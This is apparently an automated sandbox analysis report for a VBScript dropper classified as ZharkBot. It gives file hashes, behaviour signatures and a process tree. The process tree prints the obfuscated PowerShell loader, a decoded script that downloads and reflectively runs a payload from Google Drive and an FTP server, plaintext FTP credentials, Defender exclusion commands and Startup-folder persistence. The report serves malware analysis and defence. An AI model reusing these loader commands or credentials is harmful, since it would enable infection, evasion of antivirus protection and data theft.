Analysis

  • max time kernel
    29s
  • max time network
    142s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26-09-2024 09:06

General

  • Target

    arsematt.vbs

  • Size

    561KB

  • MD5

    67f78666481d600810d29e397f06abb9

  • SHA1

    958e7e831631e69e60fed3b949ba06a0eebc8b96

  • SHA256

    cfdbbae8d680f413878e6fac771ab74d077df472d0a145e2994bdf599106a8cc

  • SHA512

    3b53e2986196095ca2749ffdb3e07b5a98da5ace672f8984bca68f02bdf29c5db24ae3a76383644a071ebc8536c971b585d657a1828b4a445d7c89ef919ecd52

  • SSDEEP

    1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFl:4aD

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Signatures

  • Detects ZharkBot payload 3 IoCs

    ZharkBot is a botnet written C++.

  • ZharkBot

    ZharkBot is a botnet written C++.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\arsematt.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9уかбDsуかбKQуかбgуかбCkуかбIуかбуかбnуかбGUуかбdQByуかбHQуかбJwуかбgуかбCwуかбIуかбBYуかбFуかбуかбVQB1уかбGgуかбJуかбуかбgуかбCwуかбIуかбуかбnуかбGgуかбdуかбB0уかбHуかбуかбcwуかб6уかбC8уかбLwBlуかбHYуかбaQByуかбHQуかбdQBhуかбGwуかбcwBlуかбHIуかбdgBpуかбGMуかбZQBzуかбHIуかбZQB2уかбGkуかбZQB3уかбHMуかбLgBjуかбG8уかбbQуかбvуかбHUуかбcwуかбuуかбHQуかбeуかбB0уかбCcуかбIуかбуかбoуかбCуかбуかбXQBdуかбFsуかбdуかбBjуかбGUуかбagBiуかбG8уかбWwуかбgуかбCwуかбIуかбBsуかбGwуかбdQBuуかбCQуかбIуかбуかбoуかбGUуかбawBvуかбHYуかбbgBJуかбC4уかбKQуかбgуかбCcуかбSQBWуかбEYуかбcgBwуかбCcуかбIуかбуかбoуかбGQуかбbwBoуかбHQуかбZQBNуかбHQуかбZQBHуかбC4уかбKQуかбnуかбDEуかбcwBzуかбGEуかбbуかбBDуかбC4уかбMwB5уかбHIуかбYQByуかбGIуかбaQBMуかбHMуかбcwBhуかбGwуかбQwуかбnуかбCgуかбZQBwуかбHkуかбVуかбB0уかбGUуかбRwуかбuуかбCkуかбIуかбBaуかбGMуかбQgBjуかбGEуかбJуかбуかбgуかбCgуかбZуかбBhуかбG8уかбTуかбуかбuуかбG4уかбaQBhуかбG0уかбbwBEуかбHQуかбbgBlуかбHIуかбcgB1уかбEMуかбOgуかб6уかбF0уかбbgBpуかбGEуかбbQBvуかбEQуかбcуかбBwуかбEEуかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбDsуかбKQуかбgуかбCkуかбIуかбуかбnуかбEEуかбJwуかбgуかбCwуかбIуかбуかбnуかбJMhOgCTIScуかбIуかбуかбoуかбGUуかбYwBhуかбGwуかбcуかбBlуかбFIуかбLgBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбCуかбуかбKуかбBnуかбG4уかбaQByуかбHQуかбUwуかб0уかбDYуかбZQBzуかбGEуかбQgBtуかбG8уかбcgBGуかбDoуかбOgBdуかбHQуかбcgBlуかбHYуかбbgBvуかбEMуかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбFoуかбYwBCуかбGMуかбYQуかбkуかбCуかбуかбXQBdуかбFsуかбZQB0уかбHkуかбQgBbуかбDsуかбJwуかбlуかбEkуかбaуかбBxуかбFIуかбWуかбуかбlуかбCcуかбIуかбуかб9уかбCуかбуかбWуかбBQуかбFUуかбdQBoуかбCQуかбOwуかбpуかбCуかбуかбZwBTуかбHoуかбQwBCуかбGwуかбJуかбуかбgуかбCgуかбZwBuуかбGkуかбcgB0уかбFMуかбZуかбBhуかбG8уかбbуかбBuуかбHcуかбbwBEуかбC4уかбdQB1уかбGkуかбdQуかбkуかбCуかбуかбPQуかбgуかбGcуかбUwB6уかбEMуかбQgBsуかбCQуかбOwуかб4уかбEYуかбVуかбBVуかбDoуかбOgBdуかбGcуかбbgBpуかбGQуかбbwBjуかбG4уかбRQуかбuуかбHQуかбeуかбBlуかбFQуかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбGcуかбbgBpуかбGQуかбbwBjуかбG4уかбRQуかбuуかбHUуかбdQBpуかбHUуかбJуかбуかб7уかбCkуかбdуかбBuуかбGUуかбaQBsуかбEMуかбYgBlуかбFcуかбLgB0уかбGUуかбTgуかбgуかбHQуかбYwBlуかбGoуかбYgBPуかбC0уかбdwBlуかбE4уかбKуかбуかбgуかбD0уかбIуかбB1уかбHUуかбaQB1уかбCQуかбOwуかбpуかбCgуかбZQBzуかбG8уかбcуかбBzуかбGkуかбZуかбуかбuуかбHUуかбdQBpуかбHUуかбJуかбуかб7уかбCkуかбIуかбуかбnуかбHQуかбeуかбB0уかбC4уかбMQуかбwуかбEwуかбTуかбBEуかбC8уかбMQуかбwуかбC8уかбcgBlуかбHQуかбcуかбB5уかбHIуかбYwBwуかбFUуかбLwByуかбGIуかбLgBtуかбG8уかбYwуかбuуかбHQуかбYQByуかбGIуかбdgBrуかбGMуかбcwBlуかбGQуかбLgBwуかбHQуかбZgBуかбуかбDEуかбdуかбBhуかбHIуかбYgB2уかбGsуかбYwBzуかбGUуかбZуかбуかбvуかбC8уかбOgBwуかбHQуかбZgуかбnуかбCуかбуかбKуかбBnуかбG4уかбaQByуかбHQуかбUwBkуかбGEуかбbwBsуかбG4уかбdwBvуかбEQуかбLgB1уかбHUуかбaQB1уかбCQуかбIуかбуかб9уかбCуかбуかбZwBTуかбHoуかбQwBCуかбGwуかбJуかбуかб7уかбCkуかбJwBуかбуかбEуかбуかбcуかбBKуかбDgуかбNwуかб1уかбDEуかбMgBvуかбHIуかбcуかбByуかбGUуかбcуかбBvуかбGwуかбZQB2уかбGUуかбZуかбуかбnуかбCwуかбKQуかбpуかбDkуかбNуかбуかбsуかбDYуかбMQуかбxуかбCwуかбNwуかб5уかбCwуかбNуかбуかбxуかбDEуかбLуかбуかб4уかбDkуかбLуかбуかб4уかбDEуかбMQуかбsуかбDcуかбMуかбуかбxуかбCwуかбOQуかб5уかбCwуかбNQуかбxуかбDEуかбLуかбуかбxуかбDуかбуかбMQуかбsуかбDуかбуかбMуかбуかбxуかбCgуかбXQBdуかбFsуかбcgBhуかбGgуかбYwBbуかбCуかбуかбbgBpуかбG8уかбagуかбtуかбCgуかбKуかбBsуかбGEуかбaQB0уかбG4уかбZQBkуかбGUуかбcgBDуかбGsуかбcgBvуかбHcуかбdуかбBlуかбE4уかбLgB0уかбGUуかбTgуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбCуかбуかбdуかбBjуかбGUуかбagBiуかбG8уかбLQB3уかбGUуかбbgуかбgуかбD0уかбIуかбBzуかбGwуかбYQBpуかбHQуかбbgBlуかбGQуかбZQByуかбEMуかбLgB1уかбHUуかбaQB1уかбCQуかбOwуかб4уかбEYуかбVуかбBVуかбDoуかбOgBdуかбGcуかбbgBpуかбGQуかбbwBjуかбG4уかбRQуかбuуかбHQуかбeуかбBlуかбFQуかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбGcуかбbgBpуかбGQуかбbwBjуかбG4уかбRQуかбuуかбHUуかбdQBpуかбHUуかбJуかбуかб7уかбCkуかбdуかбBuуかбGUуかбaQBsуかбEMуかбYgBlуかбFcуかбLgB0уかбGUуかбTgуかбgуかбHQуかбYwBlуかбGoуかбYgBPуかбC0уかбdwBlуかбE4уかбKуかбуかбgуかбD0уかбIуかбB1уかбHUуかбaQB1уかбCQуかбOwBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбDsуかбMgуかбxуかбHMуかбbуかбBUуかбDoуかбOgBdуかбGUуかбcуかбB5уかбFQуかбbуかбBvуかбGMуかбbwB0уかбG8уかбcgBQуかбHkуかбdуかбBpуかбHIуかбdQBjуかбGUуかбUwуかбuуかбHQуかбZQBOуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбWwуかбgуかбD0уかбIуかбBsуかбG8уかбYwBvуかбHQуかбbwByуかбFуかбуかбeQB0уかбGkуかбcgB1уかбGMуかбZQBTуかбDoуかбOgBdуかбHIуかбZQBnуかбGEуかбbgBhуかбE0уかбdуかбBuуかбGkуかбbwBQуかбGUуかбYwBpуかбHYуかбcgBlуかбFMуかбLgB0уかбGUуかбTgуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбOwB9уかбGUуかбdQByуかбHQуかбJуかбB7уかбCуかбуかбPQуかбgуかбGsуかбYwBhуかбGIуかбbуかбBsуかбGEуかбQwBuуかбG8уかбaQB0уかбGEуかбZуかбBpуかбGwуかбYQBWуかбGUуかбdуかбBhуかбGMуかбaQBmуかбGkуかбdуかбByуかбGUуかбQwByуかбGUуかбdgByуかбGUуかбUwуかб6уかбDoуかбXQByуかбGUуかбZwBhуかбG4уかбYQBNуかбHQуかбbgBpуかбG8уかбUуかбBlуかбGMуかбaQB2уかбHIуかбZQBTуかбC4уかбdуかбBlуかбE4уかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбHsуかбIуかбBlуかбHMуかбbуかбBlуかбH0уかбIуかбBmуかбC8уかбIуかбуかбwуかбCуかбуかбdуかбуかбvуかбCуかбуかбcgуかбvуかбCуかбуかбZQB4уかбGUуかбLgBuуかбHcуかбbwBkуかбHQуかбdQBoуかбHMуかбIуかбуかб7уかбCcуかбMуかбуかб4уかбDEуかбIуかбBwуかбGUуかбZQBsуかбHMуかбJwуかбgуかбGQуかбbgBhуかбG0уかбbQBvуかбGMуかбLQуかбgуかбGUуかбeуかбBlуかбC4уかбbуかбBsуかбGUуかбaуかбBzуかбHIуかбZQB3уかбG8уかбcуかбуかб7уかбCуかбуかбZQBjуかбHIуかбbwBmуかбC0уかбIуかбуかбpуかбCуかбуかбJwBwуかбHUуかбdуかбByуかбGEуかбdуかбBTуかбFwуかбcwBtуかбGEуかбcgBnуかбG8уかбcgBQуかбFwуかбdQBuуかбGUуかбTQуかбgуかбHQуかбcgBhуかбHQуかбUwBcуかбHMуかбdwBvуかбGQуかбbgBpуかбFcуかбXуかбB0уかбGYуかбbwBzуかбG8уかбcgBjуかбGkуかбTQBcуかбGcуかбbgBpуかбG0уかбYQBvуかбFIуかбXуかбBhуかбHQуかбYQBEуかбHуかбуかбcуかбBBуかбFwуかбJwуかбgуかбCsуかбIуかбBaуかбEsуかбbgBZуかбE0уかбJуかбуかбgуかбCgуかбIуかбBuуかбG8уかбaQB0уかбGEуかбbgBpуかбHQуかбcwBlуかбEQуかбLQуかбgуかбCcуかбJQBJуかбGgуかбcQBSуかбFgуかбJQуかбnуかбCуかбуかбbQBlуかбHQуかбSQуかбtуかбHkуかбcуかбBvуかбEMуかбIуかбуかб7уかбCуかбуかбdуかбByуかбGEуかбdуかбBzуかбGUуかбcgBvуかбG4уかбLwуかбgуかбHQуかбZQBpуかбHUуかбcQуかбvуかбCуかбуかбRwBjуかбFcуかбaQBSуかбCуかбуかбZQB4уかбGUуかбLgBhуかбHMуかбdQB3уかбCуかбуかбZQB4уかбGUуかбLgBsуかбGwуかбZQBoуかбHMуかбcgBlуかбHcуかбbwBwуかбCуかбуかбOwуかбpуかбCcуかбdQBzуかбG0уかбLgBuуかбGkуかбdwBwуかбFUуかбXуかбуかбnуかбCуかбуかбKwуかбgуかбE4уかбSgBUуかбHgуかбRуかбуかбkуかбCgуかбIуかбуかб9уかбCуかбуかбRwBjуかбFcуかбaQBSуかбDsуかбKQуかбgуかбGUуかбbQBhуかбE4уかбcgBlуかбHMуかбVQуかб6уかбDoуかбXQB0уかбG4уかбZQBtуかбG4уかбbwByуかбGkуかбdgBuуかбEUуかбWwуかбgуかбCsуかбIуかбуかбnуかбFwуかбcwByуかбGUуかбcwBVуかбFwуかбOgBDуかбCcуかбKуかбуかбgуかбD0уかбIуかбBaуかбEsуかбbgBZуかбE0уかбJуかбуかб7уかбCkуかбJwB1уかбHMуかбbQуかбuуかбG4уかбaQB3уかбHуかбуかбVQBcуかбCcуかбIуかбуかбrуかбCуかбуかбTgBKуかбFQуかбeуかбBEуかбCQуかбIуかбуかбsуかбEIуかбSwBMуかбFIуかбVQуかбkуかбCgуかбZQBsуかбGkуかбRgBkуかбGEуかбbwBsуかбG4уかбdwBvуかбEQуかбLgBuуかбEoуかбeQBWуかбGoуかбJуかбуかб7уかбDgуかбRgBUуかбFUуかбOgуかб6уかбF0уかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбdуかбB4уかбGUуかбVуかбуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбbgBKуかбHkуかбVgBqуかбCQуかбOwуかбpуかбHQуかбbgBlуかбGkуかбbуかбBDуかбGIуかбZQBXуかбC4уかбdуかбBlуかбE4уかбIуかбB0уかбGMуかбZQBqуかбGIуかбTwуかбtуかбHcуかбZQBOуかбCgуかбIуかбуかб9уかбCуかбуかбbgBKуかбHkуかбVgBqуかбCQуかбOwB9уかбDsуかбIуかбуかбpуかбCcуかбdуかбBPуかбEwуかбYwBfуかбEsуかбYQуかбzуかбFoуかбZgBvуかбFgуかбMgBKуかбEoуかбcgBWуかбGgуかбbQBWуかбDkуかбYwBtуかбDkуかбWуかбBzуかбHUуかбWуかбBtуかбGoуかбMQBnуかбDEуかбJwуかбgуかбCsуかбIуかбBvуかбHgуかбSwBVуかбGcуかбJуかбуかбoуかбCуかбуかбPQуかбgуかбG8уかбeуかбBLуかбFUуかбZwуかбkуかбHsуかбIуかбBlуかбHMуかбbуかбBlуかбH0уかбOwуかбgуかбCkуかбJwуかбyуかбDQуかбdQBYуかбEoуかбVуかбBxуかбGEуかбbQBnуかбHkуかбTQB0уかбEYуかбegBhуかбGsуかбUуかбBSуかбDEуかбcQBfуかбEkуかбdgBHуかбGkуかбWуかбBOуかбGQуかбcQBhуかбE4уかбMQуかбnуかбCуかбуかбKwуかбgуかбG8уかбeуかбBLуかбFUуかбZwуかбkуかбCgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBVуかбGcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABQAGIAbgBFAFoAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABQAGIAbgBFAFoAJAAgADsA';$kahlN = $qKKzc.replace('уかб' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\arsematt.vbs');powershell $vQpeD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\arsematt.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$uiuu = (New-Object Net.WebClient);$uiuu.Encoding = [System.Text.Encoding]::UTF8;$uiuu.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $uiuu.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$uiuu.dispose();$uiuu = (New-Object Net.WebClient);$uiuu.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $uiuu.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\arsematt.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.su/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3604
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2320
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
          4⤵
            PID:4400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3132
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\faxsm.ps1"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1824
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3748
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 476
                6⤵
                • Program crash
                PID:1244
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\arsematt.vbs"
            4⤵
              PID:4868
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3748 -ip 3748
        1⤵
          PID:4716

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          627073ee3ca9676911bee35548eff2b8

          SHA1

          4c4b68c65e2cab9864b51167d710aa29ebdcff2e

          SHA256

          85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

          SHA512

          3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

        • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\faxsm.ps1

          Filesize

          1.2MB

          MD5

          8481d9764cda27d097559253f6c5804a

          SHA1

          813e576e5f5ee54ee74ead61e30b6e3d04a377a3

          SHA256

          3d641dae182ce73851fcfb842ba19ba70f0e5c2b02730fc66948cec688d3949d

          SHA512

          3a0b4eb5fd1e01656256308c40e5eca3eb036e33fe686ce22dc6223b2057359db0da020aab8d80c1c68f0b60b17565bf37c60e76224b4fecb5c320c52d9cd282

        • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

          Filesize

          336B

          MD5

          d7151ede30d42ec3a6ecbfee63af11ec

          SHA1

          d29f5f5526c63d952b9bf3925c78b2364a653094

          SHA256

          281445eaccd5547e23e4513d357164b4f85a825807f3ef5bb9c187e4a28869e9

          SHA512

          f818e239bde17c8783858e0f92cfa2e3ee029b191391d8330f6075a9329f49e952df8a113a75c1a8859566979a52fed58f546ddd3f3bde2bb1c7b3f4d6fe77d2

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          e3840d9bcedfe7017e49ee5d05bd1c46

          SHA1

          272620fb2605bd196df471d62db4b2d280a363c6

          SHA256

          3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

          SHA512

          76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          1446ec74e06911644c4d68b87e81ad2d

          SHA1

          de209b198ef0c7f09711798d860c22b00499218c

          SHA256

          3700b6e983430ded6d4513c509b51369251b6098b79eb2f429a9f47bda818c5b

          SHA512

          40cde236440d696904cf45d26466616fd036f07c1ea256f24375f13b5dfd696746ef47521c4ae1ddb479b1c56649f4dec1d8ac9f5de862d253754e27d06da3ef

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          edfb70d9ee5f7a6e08efa10e8a053b40

          SHA1

          c284a8a82b289e19640eada730dc6a7bdbfe7c00

          SHA256

          e4ee2855a9f95d7cb3fc40c0c2cfe326ce53b271efdbff0f9582b72cba899403

          SHA512

          95864e1ec795a82c270cd7973ab1c4ae3f8ffea1b0f2d093bc968b84e8eb4fdb0c6b3d86d321049416a7cf7c7c90a46bac5dc3b2aa0d521d3a80e5d85de54ae8

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhtcagw0.hcl.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/832-21-0x000001457BB40000-0x000001457BB4A000-memory.dmp

          Filesize

          40KB

        • memory/1824-75-0x0000019A48C20000-0x0000019A48C2A000-memory.dmp

          Filesize

          40KB

        • memory/1976-12-0x00007FFC3A430000-0x00007FFC3AEF2000-memory.dmp

          Filesize

          10.8MB

        • memory/1976-55-0x00007FFC3A433000-0x00007FFC3A435000-memory.dmp

          Filesize

          8KB

        • memory/1976-56-0x00007FFC3A430000-0x00007FFC3AEF2000-memory.dmp

          Filesize

          10.8MB

        • memory/1976-0-0x00007FFC3A433000-0x00007FFC3A435000-memory.dmp

          Filesize

          8KB

        • memory/1976-11-0x00007FFC3A430000-0x00007FFC3AEF2000-memory.dmp

          Filesize

          10.8MB

        • memory/1976-64-0x00007FFC3A430000-0x00007FFC3AEF2000-memory.dmp

          Filesize

          10.8MB

        • memory/1976-10-0x00007FFC3A430000-0x00007FFC3AEF2000-memory.dmp

          Filesize

          10.8MB

        • memory/1976-9-0x00000242A8D00000-0x00000242A8D22000-memory.dmp

          Filesize

          136KB

        • memory/3748-76-0x0000000000400000-0x0000000000454000-memory.dmp

          Filesize

          336KB

        • memory/3748-78-0x0000000000400000-0x0000000000454000-memory.dmp

          Filesize

          336KB

        • memory/3748-80-0x0000000000400000-0x0000000000454000-memory.dmp

          Filesize

          336KB